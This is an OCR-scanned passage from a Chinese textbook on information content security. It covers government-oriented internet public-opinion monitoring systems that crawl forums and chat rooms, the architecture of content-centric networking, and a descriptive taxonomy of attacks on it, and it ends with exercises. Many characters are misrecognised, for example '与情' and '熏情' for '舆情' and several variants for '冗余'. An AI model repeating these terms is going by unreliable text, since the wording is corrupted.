地 ,是 各 国信 息 过 滤 研 究 者 都 致力 研究 的 方向 ,也 是 家 长 .老师 们 的 共同 心愿 。 

Q 为 客户 的 过 滤 : 用 户 爱好 推荐 ,在 Internet 网 络 服务 中 ,不 同 的 客户 有 不 同 的 爱 
好 、 兴 趣 , 针 对 不 同 客户 的 需要 ,对 各 自 的 特点 进行 推荐 ,同样 是 信息 过 滤 发 展 的 一 个 重要 
方向 。 


| 55 网 络 熏 情 内 容 监 测 与 预警 


网 络 与 情 内 容 监 测 与 预警 系统 在 对 网 络 公开 发 布 信息 的 深入 与 全 面 提取 的 基础 上 ， 
通过 对 海量 非 结构 化 信息 的 挖掘 与 分 析 , 实 现 对 网 络 与 情 的 热点 、 焦 点、 演变 等 信息 的 掌 
握 , 从 而 为 网 络 与 情 监测 与 引导 部 门 的 决策 提供 科学 的 依据 。 随 着 网 络 信息 化 技术 的 发 
展 , 网 络 与 情 内 容 监测 与 预警 系统 是 网 络 信息 内 容 安全 管理 高 速 发 展 的 重要 领域 之 一 。 


5.5.1 ”网络 熏 情 系统 的 背景 与 应 用 范围 


网 络 和 与 情 预 警 监测 系统 主要 完成 互联 网 海量 信息 资源 的 综合 分 析 , 提 取 支 持 政府 部 
门 决策 所 需 的 有 效 信息 。 目 前 ,国内 外 政府 职能 部 门 与 研究 机 构 针对 该 类 系统 应 用 与 技 
术 研 发 投入 了 相当 的 资源 ,使 该 类 系统 与 技术 得 到 了 全 面 发 展 。 各 国 对 于 通过 互联 网 捕 
获 与 掌握 各 类 政治 、 军 事 文化 信息 都 从 战略 角度 予以 高 度 重视 ,重点 解决 多 渠道 信息 的 
融合 和 统一 表达 ,提高 信息 控制 能 

网 络 和 与 情 监 测 技术 的 发 展 趋势 可 以 归结 为 以 下 几 个 方面 : 

QD 针对 信息 源 的 深入 信息 采集 。 传 统 搜索 引擎 中 的 Robot, 一 般 采 用 广度 优先 的 策 
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略 遍 历 Web 并 下 载 文档 。 系 统 中 维护 一 个 超 链 队 列 (或 者 堆栈 ) 包 含 一 些 起 始 URL. 
Robot 从 这 些 URL 出 发 ,下 载 相应 的 页 面 ,把 抽取 到 的 新 超 链 加 入 队列 (或 者 堆栈 ) 中 。 
上 述 过 程 不 断 递归 重复 ,直到 队列 (或 者 堆栈 ) 为 空 。 而 以 Google、 百 度 等 为 代表 的 搜索 
引擎 技术 , 即 俗称 “大 搜索 ”的 技术 ,并 不 能 完全 满足 本 项 目 中 网 络 与 情 预 警 监测 系统 的 需 
求 。 具 体 而 言 ,“ 大 搜索 ”技术 的 主要 不 足 体现 在 对 于 互联 网 定点 信息 源 信息 的 提取 率 (一 
般 定 义 为 指定 时 刻 提取 信息 比特 数 /信息 源 信息 总 比特 数 ) 过 低 。 

@@ 异 构 信 息 的 融合 分 析 。 互 联网 信息 的 一 大 特征 就 是 高 度 的 异 构 化 。 所 谓 异 构 化 ， 
指 的 是 互联 网 信息 在 编码 .数据 格式 以 及 结构 组 成 方面 都 存在 巨大 的 差异 。 而 对 海量 信 
息 分 析 与 提取 的 重要 前 提 就 是 对 不 同 结构 的 信息 可 以 在 统一 表达 或 标准 的 前 提 下 进行 有 
机 的 整合 ,并 得 出 有 价值 的 综合 分 析 结 果 。 对 于 异 构 信 息 的 融合 分 析 , 目 前 比较 流行 的 方 
式 可 以 分 为 两 类 。 一 是 通过 采取 通用 的 具有 高 度 扩展 性 的 数据 格式 进行 资源 的 整合 ,如 
XML; 二 是 采取 基于 语义 等 应 用 层 上 层 信 息 的 抽象 融合 分 析 , 如 RDF。 

C 非 结构 信 息 的 结构 化 表达 。 与 传统 的 信息 分 析 系 统 处 理 对 象 不 同 ,针对 互联 网 信 
息 分 析 处 理 的 大 量 对 象 是 非 结 构 化 信息 。 非 结构 化 信息 的 特点 对 于 阅读 者 而 言 比 较 容易 
理解 ,然而 对 于 计算 机 信息 系统 处 理 却 相当 困难 。 对 于 结构 化 数据 ,长 期 以 来 通过 统计 学 
家 、 人 工 智能 专家 和 计算 机 系统 专家 的 共同 努力 ,有 相当 优秀 的 技术 与 方法 可 以 提供 相当 
准确 而 有 效 的 分 析 。 

互联 网 与 情 预 警 与 监测 工作 在 推进 我 国 社会 主义 民主 ,贯彻 科学 发 展 观 的 进程 中 具 
有 举足轻重 的 作用 。 在 和 谐 社会 的 建设 过 程 中 ,政府 与 群众 间 必须 建立 有 效 而 可 靠 的 信 
息 交 互 机 制 ,在 让 群众 充分 了 解 政府 方针 政策 的 同时 ,政府 也 必须 深入 了 解 群众 的 思想 动 
态 。 通 过 信息 化 手段 ,对 互联 网 呈现 的 舆情 进行 全 面 、 准 确 和 及 时 的 监测 和 预警 ,既是 建 
设 和 谐 社会 的 重要 保障 ,也 是 信息 时 代 政府 提高 执政 能 力 的 有 效 途 径 。 因 此 ,在 互联 网 全 
面 渗透 人 民生 活 各 个 环节 的 关键 时 机 ,及 时 启动 网 络 和 与 情 监 测 与 预警 系统 的 建设 ,具有 相 
当 的 迫切 性 和 必要 性 。 


5.5.2 ”网 络 熏 情 系统 的 功能 分 解 


根据 网 络 与 情 监测 预警 系统 的 实际 需求 和 目前 国内 外 技术 发 展 的 现状 ,建议 从 网 络 
媒体 信息 提取 、 网 络 媒体 内 容 聚 合 分 析 以 及 网 络 媒体 内 容 综合 表达 等 几 个 方面 进行 核心 
技术 攻关 。 事 实 上 ,这 些 技术 也 是 互联 网 中 信息 资源 开发 与 利用 中 的 重要 核心 技术 。 这 
些 技术 的 攻克 与 应 用 可 初步 实现 针对 互联 网 海量 信息 的 综合 分 析 , 实 现 网 络 发 展 与 管理 
的 决策 支持 。 


1. 高 仿真 网 络 信息 (论坛 .聊天 室 ) 深 度 提 取 技术 
网 络 与 情 监测 预警 的 主要 目的 是 对 互联 网 中 的 各 类 重点 、 难 点 .疑点 和 热点 与 情 ,做 
及 时 、 有 效 的 监测 和 应 对 。 因 此 ,在 针对 互联 网 的 信息 提取 中 ,对 于 动态 、 实 时 、 分 布 式 发 
布 信息 的 准确 与 深度 采集 有 很 高 的 要 求 。 目 前 一 般 的 网 络 媒体 信息 采集 技术 不 能 满足 网 
络 与 情 监测 预警 基础 设施 与 关键 应 用 的 技术 需要 。 因 此 ,研究 和 模拟 人 机 交互 技术 ,实现 
对 于 操作 人 浏览 网 络 媒体 行为 的 全 面 高 仿真 的 网 络 信息 (论坛 .聊天 室 ) 深 度 提取 技术 是 
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网 络 和 与 情 监 测 预警 系统 成 功 建设 的 基础 核心 内 容 。 

高 仿真 网 络 信息 (论坛 .聊天 室 ) 深 度 提 取 技 术 重 点 研究 智能 化 .高 效率 的 远程 网 络 互 
动 式 动态 信息 的 全 面 提取 ,并 形成 功能 齐全 ,性 能 稳定 的 动态 信息 提取 系统 。 该 系统 独立 
地 对 指定 网 络 动态 媒体 进行 信息 的 深入 提取 ,将 成 为 网 络 和 与 情 监测 预警 系统 中 重要 的 信 
息 获取 功能 模块 。 针 对 网 络 与 情 监测 预警 系统 需求 设计 开发 的 高 仿真 网 络 信息 (论坛 、. 聊 
天 室 ) 深 度 提取 系统 功能 示意 框图 如 图 5-8 所 示 。 整 个 系统 可 以 分 为 定点 BBS/BLOG/ 
聊天 室内 容 提取 模块 ,内 容 匈 余 性 与 完整 性 过 滤 模 块 ,以 及 查询 与 编辑 接口 模块 。BBS/ 
BLOG/ 聊 天 室内 容 提取 模块 的 主要 功能 是 对 用 户 指定 的 一 个 或 多 个 信息 源 进行 遍历 式 
的 信息 获取 ;内 容 元 余 性 与 完整 性 过 滤 模 块 是 对 在 本 地 镜像 的 网 站 内 容 在 进行 高 效 ,准确 
理解 的 基础 上 ,对 宛 余 信息 和 不 完整 信息 进行 相应 的 处 理 , 以 保障 信息 数据 库 中 内 容 的 准 
确 性 和 有 效 性 ;查询 与 编辑 接口 模块 将 为 外 界 的 系统 调用 提供 必要 的 信息 数据 库 操作 
接口 。 

| cm EM 


定点 BBS/BLOG/ 
聊天 室内 容 提取 


PE 
内 容 见 余 性 ， 
完整 性 过 滤 


外 部 系统 调用 
查询 与 编辑 接口 


图 5-8 高 仿真 网 络 信息 深度 提取 


2. 基于 语义 的 海量 媒体 内 容 特征 快速 提取 与 分 类 技术 

互联 网 信息 的 一 大 特征 就 是 高 度 的 异 构 化 和 非 结 构 化 。 为 确保 互联 网 中 海量 的 非 结 
构 化 . 异 构 化 和 多 样 的 信息 资源 ,必须 研究 自主 知识 产权 的 基于 语义 的 海量 媒体 内 容 特征 
快速 提取 与 分 类 技术 ,才能 在 信息 采集 系统 的 基础 上 实现 进一步 的 信息 特征 提取 和 结构 
化 转变 功能 ,为 进一步 实现 与 情 的 分 析 ,监测 与 预警 完成 必需 的 信息 转化 。 

基于 语义 的 海量 文本 特征 快速 提取 与 分 类 技术 重点 研究 针对 网 络 文本 媒体 ,特别 是 
中 文 媒体 的 基于 语义 的 特征 快速 提取 ,并 在 此 基础 上 形成 适合 网 络 与 情 预 警 监测 系统 需 
要 的 基于 语义 的 海量 文本 特征 快速 提取 与 分 类 系统 。 该 系统 将 独立 地 对 各 个 信息 源 采 集 
入 库 的 信息 进行 语义 分 析 , 特 别 将 对 信息 中 的 语义 特征 进行 统计 和 分 类 ,完成 对 于 原始 数 
据 库 的 预 处 理 , 为 进一步 的 信息 聚合 分 析 与 表达 提供 相对 标准 化 和 正则 化 的 信息 库 。 该 
系统 将 成 为 网 络 与 情 监测 与 预警 系统 中 重要 的 信息 分 析 功 能 模块 。 

图 5-9 为 针对 网 络 与 情 监测 与 预警 系统 需求 设计 开发 的 基于 语义 的 海量 文本 特征 快 
速 提取 与 分 类 系统 功能 示意 框图 。 整 个 系统 可 以 分 为 基于 分 词 的 文本 特征 提取 模块 , 基 
于 字 频 统计 的 文本 特征 提取 模块 ,基于 互联 网 网 络 媒体 特征 的 多 媒体 特征 提取 模块 ,以 及 
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分 类 特征 统计 与 分 析 模 块 。 基 于 分 词 的 文本 特征 提取 模块 首先 将 对 原始 信息 库 中 的 信息 
进行 全 文 分 词 ,接着 在 分 词 的 基础 上 进行 一 定 的 统计 分 析 ,综合 分 词 与 统计 分 析 的 结果 将 
原始 信息 库 中 的 信息 进行 特征 提取 ;基于 字 频 统计 的 文本 特征 提取 模块 首先 对 原始 信息 
库 中 的 信息 进行 全 文字 频 统计 ,根据 字 频 统计 结构 对 原始 信息 进行 摘要 ,并 在 此 基础 上 实 
现 对 原始 信息 库 中 信息 的 特征 提取 ;基于 互联 网 网 络 媒体 特征 的 多 媒体 特征 提取 模块 就 
是 对 原始 信息 库 中 的 多 媒体 信息 (通常 是 含有 文字 和 图 片 的 网 页 信息 ), 进 行 多 媒体 群 件 
分 析 ; 分 类 特征 统计 与 分 析 模块 是 针对 前 述 三 个 模块 采集 的 互联 网 信息 库 特 征 信 息 进 行 
进一步 的 分 类 特征 统计 和 分 析 , 其 主要 功能 是 将 三 种 不 同 技术 路 线 得 到 的 结论 做 进一步 
的 融合 和 统一 ,以 保证 基于 语义 的 海量 文本 特征 快速 提取 与 分 类 系统 产生 的 互联 网 与 情 
信息 作业 信息 库 的 标准 化 和 正则 化 。 


基于 分 词 的 文本 
特征 提取 
互联 网 舆情 信息 
原始 数据 库 
LL. | 基于 字 频 统计 的 
文本 特征 提取 
分 类 特征 统计 分 析 
基于 互联 网 网 络 媒体 
特性 的 多 媒体 特征 提取 
互联 网 与 情 信息 
作业 数据 库 
(标准 化 、 正 则 化 ) 


图 5-9 基于 语义 的 海量 文本 特征 快速 提取 与 分 类 


3. 非 结构 信息 自 组 织 聚 合 表达 技术 

对 于 互联 网 中 大 量 的 以 非 结构 化 存在 的 信息 资源 ,一 方面 需要 完成 基于 语义 的 结构 
化 转化 , 另 一 方面 ,为 满足 网 络 与 情 监测 预警 基础 设施 与 典型 应 用 的 实际 需求 ,还 必须 实 
现 非 结 构 信 息 的 自 组 织 聚 合 表达 技术 。 

非 结构 信 息 自 组 织 聚 合 表 达 重 点 研究 的 是 针对 海量 非 结构 化 信息 库 一 一 互联 网 与 情 
信息 作业 信息 库 , 实 现 无 主题 的 聚合 分 析 。 根 据 国家 网 络 和 与 情 监 测 部 门 的 与 情 监 测 与 预 
警 业 务 需 求 ,网络 与 情 预警 系统 最 重要 的 功能 是 实现 自动 的 ,无 人 工 干预 的 ,独立 的 与 情 
报告 。 而 实现 该 报告 的 核心 步骤 ,就 是 通过 非 结构 信息 自 组 织 聚 合 表达 系统 ,对 前 述 之 互 
联网 海量 非 结构 数据 的 结构 化 数据 库 进 行 有 效 的 知识 发 现 和 数量 化 的 趋势 分 析 。 

图 5-10 为 针对 网 络 与 情 监测 与 预警 系统 需求 设计 开发 的 非 结 构 信 息 自 组 织 聚 合 表 
达 系 统 功 能 示意 框图 。 整 个 系统 可 以 分 为 数据 分 类 模块 .数据 仓储 模块 和 分 类 数据 库 数 
据 挖掘 引擎 模块 。 数 据 分 类 模块 主要 是 对 互联 网 与 情 信息 作业 数据 库 进行 预 处 理 ,将 数 
据 按 一 定 的 特征 进行 较为 粗 体 的 划分 ,为 进一步 的 查询 和 挖掘 实现 简单 的 聚 类 ;数据 仓储 
模块 将 实现 对 于 网 络 与 情 工 作 数据 库 的 仓储 化 改造 ,为 提高 进一步 的 查询 和 挖掘 效率 葛 
定 基础 ;分 类 数据 库 数据 挖掘 引擎 模块 主要 将 实现 的 是 该 系统 的 核心 功能 一 一 非 结 构 信 
息 的 自 组 织 聚 合 表达 。 
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互联 网 与 情 信息 互联 网 与 情 信息 
_ 作 业 数 据 库 作业 数据 库 (分类) 
(标准 化 、 正 则 化 ) 


分 类 数据 库 数 据 挖掘 引擎 
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5-10” 非 结构 信息 自 组 织 聚 合 表达 


5.5.3 ”互联 网 与 情 内 容 分 析 


伴随 互联 网 的 迅速 普及 ,各 式 各 样 、 良 劳 不 齐 的 发 布 内 容 日 渐 泛滥 ,传统 、 纯 粹 的 “人 
海 " 战 术 已 经 无 法 满足 当前 互联 网 媒体 信息 监控 工作 的 实际 需求 。 基 于 互联 网 媒体 发 布 
内 容 主 动 获取 、 分 析 挖掘 与 表达 呈现 等 系列 技术 开展 互联 网 论坛 监测 工作 ,首先 需要 保证 
相关 监测 产品 对 于 目标 站 点 发 布 数据 的 提取 比率 , 即 监测 产品 信息 提取 部 分 的 具体 性 能 。 
根据 当前 网 络 监管 部 门 对 于 互联 网 论坛 监控 工作 的 实际 应 用 需求 ,成 熟 的 互联 网 论坛 监 
控 产 品 必须 具备 针对 指定 信息 源 的 深度 挖掘 技术 。 所 谓 深度 挖掘 ,并 非 业 已 成 熟 的 追求 
数据 引用 量 的 大 搜索 引擎 信息 采集 技术 ,而 是 利用 定向 搜索 手段 完成 针对 指定 信息 源深 
入 ,全面 的 发 布 内 容 提取 操作 。 其 次 ,当前 互联 网 利用 动态 脚本 生成 的 动态 内 容 已 经 占据 
主导 地 位 ,出 于 功能 全 面 性 与 产品 实用 性 等 多 方 考虑 ,面向 结构 过 异 . 风 格 多 样 的 数据 发 
布 源 实施 互联 网 媒体 信息 监控 工作 ,相关 监控 产品 信息 提取 部 分 还 需 具 备 相当 高 的 普 适 
性 与 可 扩展 性 。 

关于 获取 信息 分 析 挖 掘 与 表达 呈现 方面 ,针对 异 构 的 互联 网 媒体 发 布 内 容 ,网络 信息 
监控 工作 在 要 求 获取 内 容 统一 存储 的 同时 ,对 于 在 海量 的 互联 网 媒体 信息 中 实现 热点 自 
动 发 现 的 需求 明确 。 一 方面 , 异 构 信 息 归 一 化 存储 是 后 续 各 类 信息 处 理工 作 的 根本 保证 ; 
另 一 方面 ,基于 海量 数据 实现 网 络 热点 自动 发 现 , 更 有 利于 互联 网 媒体 监控 人 员 全 面 把 握 
目标 互联 网 与 情 分 布 情况 ,跟踪 互联 网 潜在 热点 ,及 时 完成 热点 发 现 及 应 对 决策 生成 
工作 。 

互联 网 与 情 信息 监控 系统 充分 应 用 网 络 协商 与 人 机 对 话 模拟 等 先进 技术 ,基于 专项 
研发 的 “定点 网 站 深入 挖掘 "机制, 实现 针对 系统 目标 站 点 发 布 内 容 的 全 面 获取 。 在 提取 
信息 发 布 作者 ,发 布 时 间 、URL、 主 题 等 关键 信息 的 基础 上 .监控 系统 进行 主题 信息 分 析 
及 内 容 快 照 ,进而 归 一 化 存储 来 自 异 构 站 点 的 发 布 内 容 。 监 控 系 统 针对 获取 内 容 关 键 信 
息 开放 单一 和 组 合 选项 “与 或 ”热点 查询 操作 ,最 终 呈现 系统 目标 站 点 关于 社会 焦点 更 为 
全 面 的 讨论 分 布 情况 与 话题 具体 内 容 。 另 一 方面 ,监控 系统 借助 获取 内 容 主题 信息 提取 
操作 ,开放 热点 数据 报告 定制 功能 。 
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56 内容 中 心 网 络 及 安全 


下 一 代 网 络 对 高 度 可 扩展 的 组 网 结构 和 高 效 的 内 容 分 发 机 制 的 需求 急速 增长 。 内 容 
中 心 网 络 (Content Centric Network. CCN) 通 过 提供 面向 内 容 本 身 的 网 络 协议 ,包括 以 
内 容 为 中 心 的 订阅 机 制 和 语义 主导 的 命名 .路 由 和 缓存 策略 ,在 解决 当前 基于 IP 地 址 进 
行 联网 的 模式 上 体现 出 了 巨大 的 潜力 。 内 容 中 心 网 络 在 快速 .高 效 的 数据 传输 和 增强 的 
可 靠 性 方面 的 明显 优势 ,使 其 成 为 诸如 物 联 网 (IoT)、5G 网 络 中 极 有 竞争 力 的 网 络 模 型 。 
内 容 中 心 网 络 被 视 为 一 种 新 的 网 络 体系 结构 ,其 中 的 安全 问题 被 视 为 该 体系 结构 的 一 部 
分 。 内 容 中 心 网 络 面临 着 来 自传 统 网 络 的 旧式 攻击 变形 后 的 攻击 (如 传统 DDoS 攻击 演 
变 而 来 的 兴趣 包 洪 范 攻击 ) ,以 及 来 自 其 网 络 架构 的 新 型 内 容 攻击 。 


5.6.1 内 容 中 心 网 络 架 构 


内 容 中 心 网 络 设计 的 基本 原理 是 握 弃 以 IP 地 址 为 中 心 的 传输 架构 ,采用 以 内 容 名 称 
为 中 心 的 传输 架构 。 内 容 中 心 网 络 架构 的 主要 构成 可 分 为 以 下 几 类 : 内 容 信息 对 象 、 命 
名 路由、 缓存 和 应 用 程序 编程 接口 。 


1. 内 容 信 息 对 象 

信息 对 象 是 指 内 容 本 身 , 它 是 CCN 的 关注 焦点 。 内 容 信息 对 象 可 以 是 网 页 ,文档 、 
电影 .照片 .歌曲 ,以 及 流 媒 体 和 互动 媒体 , 换 句 话说 ,存储 在 计算 机 中 并 通过 计算 机 访问 
的 所 有 类 型 的 对 象 都 可 以 看 作 内 容 信息 对 象 。 内 容 信息 对 象 与 其 位 置 .存储 方法 .应 用 程 
序 和 传输 方式 无 关 。 这 意味 着 无 论 内 容 信息 对 象 如 何 被 复制 .存储 和 传输 ,其 名 称 及 身份 
不 变 , 也 意味 着 内 容 信息 对 象 的 任意 两 个 副本 对 任意 操作 都 是 等 价 的 。 例 如 ,任何 持 有 副 
本 的 节点 都 可 以 将 其 提供 给 请 求 者 。 


2. 命名 

内 容 的 命名 是 信息 对 象 的 标识 ,具有 全 局 性 和 唯一 性 ,其 地 位 与 TCP/IP 架构 的 IP 
地 址 类 似 。CCN 中 的 命名 方案 主要 有 分 层 命名 和 扁平 命名 。 分 层 命名 拥有 与 当前 URL 
类 似 的 结构 ,其 名 称 由 多 个 分 层 组 件 组 成 。 层 次 结构 命名 以 发 布 者 的 前 缀 为 根 ,可 实现 路 
由 信息 的 聚合 ,从 而 提高 路 由 系统 的 可 扩展 性 。 在 某 些 情况 下 ,名 称 是 人 类 可 读 的 ,这 使 
得 用 户 可 以 手动 输入 名 称 , 并 在 某 种 程度 上 可 以 评估 名 称 与 用 户 感 兴趣 的 内 容 之 间 的 
关系 。 

扁平 命名 也 称 为 自我 认证 命名 ,该 命名 方式 可 以 验证 对 象 的 名 称 -数据 完整 性 ,而 无 
需 公 钥 基 础 设施 (Public Key Infrastructure. PKD) 或 其 他 第 三 方 。 自 我 认证 命名 可 以 通 
过 将 内 容 的 哈 希 与 对 象 的 名 称 紧密 绑 定 来 实现 : 一 种 方法 是 直接 绑 定 , 即 直接 在 对 象 名 
称 中 骨 入 内 容 的 哈 希 ; 另 一 种 方法 是 间接 绑 定 ,将 发 布 者 的 公 钥 嵌入 名 称 中 ,并 使 用 相应 
的 私 钥 对 内 容 的 哈 希 进行 签名 。 自 我 认证 命名 得 到 的 对 象 名 称 通常 是 非 层次 的 或 平面 
的 。 除 了 具有 唯一 性 和 持久 性 外 ,自我 认证 命名 还 具有 不 限于 任何 组 织 . 易 于 完整 性 检查 
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3. 路 由 

在 CCN 中 ,内 容 信息 分 发 依赖 于 内 容 发 布 (Publication) 与 订阅 (Subscription) 的 异 
步 机 制 。 一 方面 ,发 送 方 不 直接 向 接收 方 发 送 内 容 消息 ,而 是 在 网 络 中 发 布 内 容 消息 的 摘 
要 ,以 告知 网 络 它 所 要 共享 的 内 容 ; 另 一 方面 ,接收 方 在 网 络 中 订阅 其 感 兴趣 的 内 容 , 而 不 
需要 知道 内 容 的 所 有 者 。 当 发 送 方 的 发 布 消息 与 接收 方 的 订阅 兴趣 相 匹 配 时 ,CCN 网 络 
会 建立 从 发 送 方 到 接收 方 的 传送 路 径 。 

CCN 使 用 基于 名 称 的 路 由 。 客 户 端 通过 发 送 兴趣 包 来 请 求 内 容 信息 对 象 , 每 个 
CCN 节点 根据 其 转发 信息 库 (Forwarding Information Base. FIB) ,使 用 最 长 前 级 匹配 原 
则 ,将 其 路 由 到 具有 名 称 前 级 的 发 布 者 ,可 以 使 用 类 似 于 当今 互联 网 中 使 用 的 路 由 协议 来 
构建 FIB。 同 时 ,每 个 CCN 节点 维护 待定 兴趣 表 (Pending Interest Table. PIT) ,用 以 保 
留 每 个 未 完成 的 请 求 状态 。 这 使 得 请 求 聚合 成 为 可 能 , 即 当 同一 节点 接收 到 针对 相同 内 
容 信息 对 象 的 多 个 请 求 时 , 仅 需 要 将 第 一 个 请 求 转发 到 内 容 信息 源 。 

当 在 路 径 上 遇 到 数据 对 象 的 副本 时 ,包含 所 请 求 对 象 的 数据 包 通过 反 向 路 径 被 发 送 
回 客户 端 (沿路 径 的 所 有 节点 缓存 对 象 的 副本 )。 使 用 兴趣 包 在 节点 中 留 下 的 状态 找到 反 
向 路 径 。 


4. 缓存 

缓存 是 CCN 服务 不 可 或 缺 的 一 部 分 ,CCN 中 的 网 内 缓存 实现 了 以 下 原则 : 统一 的 ， 
即 应 用 于 任何 协议 提供 的 所 有 内 容 ; 民 主 的 , 即 由 任何 内 容 提供 者 发 布 的 ;普遍 存在 的 , 即 
可 用 于 所 有 网 络 节点 。 

CCN 支持 路 径 上 缓存 ,每 个 CCN 节点 维护 缓存 表 (Cache Store，CS) ,用 于 缓存 
CCN 路 由 器 接收 的 内 容 信息 对 象 (对 请 求 的 响应 ) 以便 可 以 从 该 缓存 中 响应 后 继 接收 到 
的 对 相同 对 象 的 请 求 。 客 户 端 请 求 内 容 信息 对 象 时 ,如 果 在 请 求 兴趣 包 传输 路 径 上 过 到 
内 容 信息 对 象 的 副本 , 则 包含 所 请 求 对 象 的 数据 包 将 直接 通过 反 向 路 径 被 发 送 回 客户 端 ， 
同时 路 径 上 的 所 有 节点 缓存 该 对 象 的 副本 。 


5. 应 用 程序 编程 接口 

CCN 应 用 程序 编程 接口 是 根据 请 求 和 交付 内 容 信息 对 象 定义 的 。 源 /生产 者 将 内 容 
信息 对 象 发 布 到 网 络 ,以 使 内 容 对 象 可 供 网 络 中 的 其 他 用 户 使 用 。 客 户 /消费 者 发 送 其 感 
兴趣 的 内 容 的 订阅 消息 ,以 获取 相关 内 容 对 象 。 发 布 和 获取 两 个 操作 都 使 用 内 容 信息 对 
象 的 名 称 作为 主要 参数 。 此 外 ,一 些 方法 支持 补充 参数 。 例 如 ,CURLING 方法 支持 位 置 
首选 项 ,用 于 搜索 和 过 滤 发 布 和 订阅 。 


5.6.2. 面向 内 容 中 心 网 络 的 攻击 分 类 


内 容 中 心 网 络 具 有 许多 独特 的 属性 ,如 位 置 独立 命名 、 网 络 内 缓存 、 基 于 名 称 的 路 由 
和 内 置 安全 性 。 在 内 容 中 心 网 络 体系 结构 中 ,除了 可 能 对 网 络 流量 产生 影响 的 旧式 攻击 
之 外 ,还 出 现 了 新 的 攻击 。 内 容 中 心 网 络 将 安全 模型 从 保护 转发 路 径 更 改 为 保护 内 容 使 
其 可 以 为 所 有 网 络 节点 使 用 ,因此 内 容 中 心 网 络 攻击 可 以 分 为 命名 、 路 由 、 缓 存 和 其 他 
攻击 。 
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l. 命名 相关 攻击 
由 于 内 容 请 求 对 网 络 可 见 , 因 此 CCN 架构 在 隐私 方面 面临 更 大 的 威胁 。 许 多 攻击 
者 试图 审查 /监控 互联 网 使 用 情况 。 在 与 命名 相关 的 攻击 中 ,攻击 者 试图 通过 阻止 内 容 的 
传递 和 /或 通过 检测 谁 请 求 此 内 容 来 阻止 特定 内 容 的 分 发 。 命 名 攻击 可 以 分 为 监视 列表 
和 嗅 探 攻击 。 

监控 列表 攻击 中 ,攻击 者 具有 预定 义 的 想 要 过 滤 或 删除 的 内 容 名 称 列 表 ,攻击 者 监视 
网 络 链接 以 执行 实时 过 滤 。 在 与 预定 义 列表 匹配 的 情况 下 ,攻击 者 可 以 删除 请 求 或 记录 
请 求 者 的 信息 。 此 外 ,攻击 者 可 能 会 尝试 删除 匹配 的 内 容 本 身 。 与 监控 列表 攻击 中 的 预 
定义 列表 不 同 , 嗅 探 攻击 中 的 攻击 者 监视 网 络 以 检查 数据 是 否 应 该 被 标记 以 便 过 滤 或 消 
除 它 。 如 果 数 据 包 含 指定 的 关键 字 , 则 嗅 探 攻击 者 标记 数据 。 攻 击 场景 与 监控 列表 攻击 
相同 ,主要 区 别 在 于 攻击 者 没有 预定 义 列表 ,但 需要 对 请 求 或 内 容 进行 一 些 分 析 。 

命名 相关 攻击 允许 攻击 者 审查 和 过 滤 内 容 , 获 取 有 关内 容 流行 性 和 用 户 兴趣 的 私人 
信息 ,甚至 阻止 用 户 对 标记 内 容 的 请 求 ,引起 拒绝 服务 。 


2. 路 由 相关 攻击 

此 类 攻击 可 分 为 分 布 式 拒绝 服务 (Distributed Denial of Service. DDoS) 和 欺骗 攻击 。 
其 中 ,DDoS 攻击 可 分 为 资源 耗 尽 和 时 间 攻 击 ,欺骗 攻击 可 分 为 阻塞 攻击 ,劫持 攻击 和 拦 
截 攻击 。 

在 路 由 相关 攻击 中 ,以 分 布 式 拒绝 服务 攻击 造成 的 危害 影响 最 大 。 传 统 网 络 的 
DDoS 攻击 多 表现 为 : 控制 许多 终端 系统 的 攻击 者 向 网 络 发 送 大 量 恶意 请 求 , 以 耗 尽 路 由 
设备 资源 ,如 内 存 和 处 理 能 力 等 。 而 在 内 容 中 心 网 络 中 ,攻击 者 旨 在 填充 内 容 中 心 网 络 路 
HL ,为 合法 用 户 造成 DDoS, 这 类 攻击 又 称 为 兴趣 洪 泛 攻击 。 这 是 因为 攻击 者 可 以 针对 
可 用 和 不 可 用 的 内 容 发 送 这 些 恶 意 请 求 。 被 攻击 的 路 由 器 试图 满足 这 些 恶 意 请 求 并 将 其 
转发 到 相 邻 的 路 由 器 ,从 而 使 恶意 请 求 在 网 络 中 传播 。 在 这 种 情况 下 ,满足 合法 请 求 需要 
较 长 的 响应 时 间 。 如 果 响 应 时 间 超 过 特定 阔 值 , 则 合法 请 求 不 会 被 满足 。 这 种 攻击 的 影 
响 在 内 容 中 心 网 络 中 会 被 逐渐 放大 ,因为 合法 用 户 会 不 断 重 新 传输 不 满意 的 请 求 , 从 而 造 
成 了 网 络 的 额外 过 载 。 

路 由 相关 攻击 可 能 引起 拒绝 服务 .资源 耗 尽 .路 径 渗 透 、 隐 私 泄露 等 ,对 内 容 中 心 网 络 
造成 较 大 威胁 。 


3. 缓存 相关 攻击 

常见 的 缓存 攻击 情形 下 ,攻击 者 不 断 发 送 随 机 或 不 流行 的 请 求 到 内 容 中 心 网 络 中 , 通 
过 更 改 内 容 流行 度 来 破坏 内 容 中 心 网 络 的 缓存 。 这 些 恶意 请 求 会 强制 缓存 系统 存储 最 不 
流行 的 内 容 , 并 驱逐 流行 内 容 。 通 常 当 用 户 首次 请 求 某 个 内 容 时 ,内 容 中 心 网 络 会 从 原始 
源 中 获取 内 容 以 响应 用 户 请 求 。 如 果 其 他 用 户 再 次 请 求 相同 的 内 容 , 则 第 2 个 用 户 将 从 
路 由 器 中 获取 最 近 的 可 用 副本 (而 不 是 原始 源 ) 。 如 果 攻 击 者 成 功 使 网 络 缓存 了 不 流行 的 
内 容 , 而 第 2 个 用 户 请 求 相 同 的 内 容 , 则 第 2 个 用 户 将 从 原始 数据 源 获取 内 容 , 而 不 是 最 
近 的 可 用 副本 。 第 2 个 用 户 的 请 求 在 攻击 情况 下 将 重新 遍历 第 1 个 用 户 的 请 求 的 整个 路 
径 , 极 大 地 降低 了 内 容 中 心 网 络 的 分 发 效率 。 内 容 中 心 网 络 中 的 缓存 相关 攻击 可 能 引发 
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拒绝 服务 、 隐 私 泄露 \ 缓 存 污染 等 。 


4. 其 他 攻击 

其 他 攻击 包括 攻击 者 试图 获取 受 限 访问 内 容 , 攻 击 者 试图 破坏 签名 者 的 密 钥 并 充当 
合法 的 发 布 者 ,攻击 者 尝试 修改 、 删 除 或 重播 内 容 。 网 络 内 缓存 属性 可 最 大 化 这 些 型 的 攻 
击 , 因 为 可 以 从 多 个 位 置 访问 内 容 。 


57 习题 


1. 你 认为 信息 内 容 安 全 的 主要 技术 有 哪些 ? 

2. 你 认为 信息 内 容 安全 技术 上 的 发 展 能 否 解 决 所 有 的 信息 内 容 的 安全 问题 ? 

